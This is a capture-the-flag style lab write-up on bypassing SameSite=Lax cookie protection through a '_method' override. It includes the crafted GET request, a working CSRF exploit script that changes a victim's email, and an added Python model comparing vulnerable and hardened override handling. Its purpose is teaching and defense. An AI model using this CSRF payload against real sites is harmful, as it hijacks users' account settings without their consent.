SameSite Lax Bypass via Method Override
SameSite Lax bypass via method override · Practitioner
Solution
Given: we want to change the user's email address with a CSRF attack, bypassing the SameSite restriction via method override. The session cookie here is SameSite=Lax, which means that on cross-site requests the browser attaches it only to top-level navigations using a safe method such as GET, that is, when the URL in the browser's address bar changes.
We find the request and see: a POST request with one parameter in the body, email.
OK, let's try simply swapping POST for GET — Method not allowed. Let's try the classic — the _method query param:
GET /my-account/change-email?email=xui1@p.ru&_method=POST HTTP/2
That payload goes through.
What do we host on the exploit server?
<script>
location = 'https://0a6b0055046e423e8141849f004500f8.web-security-academy.net/my-account/change-email?email=hacked@p.ru&_method=POST'
</script>
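An added example, not code from the lab or from this write-up: a small Python model of the server-side decision that makes the bypass work, with the override policy that honours `_method` from a GET query string beside a hardened policy that never lets a GET be promoted to POST. The host name is taken from the request above; the route's responses are assumed, since the lab's server code is not public.

```python
# Added model (not the lab's or the write-up's code): a '_method' override honoured on GET
# lets a SameSite=Lax cookie ride a cross-site GET navigation into a state-changing action.
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

LAB_HOST = "0a6b0055046e423e8141849f004500f8.web-security-academy.net"  # from the request above

@dataclass
class Request:
    method: str
    url: str
    body: dict = field(default_factory=dict)
    cross_site: bool = False  # True when issued by a top-level navigation from another site

def lax_cookie_attached(req: Request) -> bool:
    """SameSite=Lax: sent on same-site requests, and cross-site only on safe-method navigations."""
    return (not req.cross_site) or req.method == "GET"

def effective_method_vulnerable(req: Request) -> str:
    """Honours _method from the query string regardless of the real verb (the lab's behaviour)."""
    override = parse_qs(urlsplit(req.url).query).get("_method")
    return override[0].upper() if override else req.method

def effective_method_hardened(req: Request) -> str:
    """Only a real POST may be overridden, and only from its body, so a GET can never become a POST."""
    if req.method != "POST":
        return req.method
    return str(req.body.get("_method", "POST")).upper()

def change_email(req: Request, effective_method) -> str:
    """Assumed outcome of /my-account/change-email under a given override policy."""
    if not lax_cookie_attached(req):
        return "302 login"  # no session cookie arrived with the request
    if effective_method(req) != "POST":
        return "405 Method Not Allowed"
    return "200 email changed"

# Constructed from the write-up's exploit: a cross-site top-level GET navigation.
CSRF_NAV = Request("GET", f"https://{LAB_HOST}/my-account/change-email?email=hacked@p.ru&_method=POST",
                   cross_site=True)
# The legitimate same-site form submission the application expects.
LEGIT_POST = Request("POST", f"https://{LAB_HOST}/my-account/change-email", body={"email": "me@p.ru"})

if __name__ == "__main__":
    for name, policy in (("vulnerable", effective_method_vulnerable), ("hardened", effective_method_hardened)):
        print(f"{name}: csrf -> {change_email(CSRF_NAV, policy)} | legit -> {change_email(LEGIT_POST, policy)}")
```

Under the vulnerable policy the cross-site GET succeeds because the Lax cookie travels with it; under the hardened policy the same navigation is rejected while the legitimate POST still works.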